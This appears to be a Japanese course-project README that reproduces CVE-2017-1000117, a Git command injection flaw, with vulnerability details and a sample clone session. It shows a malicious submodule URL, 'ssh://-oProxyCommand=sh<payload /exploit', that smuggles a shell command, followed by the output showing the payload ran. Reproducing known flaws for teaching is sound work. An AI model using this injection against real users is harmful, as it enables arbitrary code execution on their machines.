CVE-2017-1000117
プロジェクト概要
- ネットワークセキュリティコース設計のテーマの一つ
- CVE-2017-1000117 脆弱性の再現(PoC+Exp)
- Git + SSH
脆弱性の概要:
- 脆弱性名称: Gitコマンドインジェクション脆弱性
- CNNVD番号:CNNVD-201708-670
- 危険度:中
- CVE番号:CVE-2017-1000117
- 脆弱性タイプ:コマンドインジェクション
- 公開日:2017-08-16
- 脅威タイプ:リモート
- 更新日:2017-10-17
- ベンダー:git-scm
- 脆弱性発見者:TrevorJay
- 脆弱性概要:Gitは、アメリカのソフトウェア開発者リーナス・トーバルズ(Linus Torvalds)によって開発された、無料でオープンソースの分散バージョン管理システムです。Git 2.7.5より前のバージョンにはコマンドインジェクションの脆弱性が存在します。リモート攻撃者は特別に細工された'ssh://...' URLを介して、任意のデバイス上で任意のプログラムを実行する可能性があります。
悪用手順
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.
*********************************************
_ooOoo_
o8888888o
88" . "88
(| -_- |)
O\ = /O
____/`---'\____
.' \\| |// `.
/ \\||| : |||// \
/ _||||| -:- |||||- \
| | \\\ - /// | |
| \_| ''\---/'' | |
\ .-\__ `-` ___/-. /
___`. .' /--.--\ `. . __
."" '< `.___\_<|>_/___.' >'"".
| | : `- \`.;`\ _ /`;.`/ - ` : | |
\ \ `-. \_ __\ /__ _/ .-` / /
======`-.____`-.___\_____/___.-`____.-'======
`=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
- 仏陀が現れたとき、脆弱性が再現され、ペイロード内の悪意のあるコードが正常に実行されたことを示しています。
2019/06/21 10:30 更新
2019/06/21 19:39 更新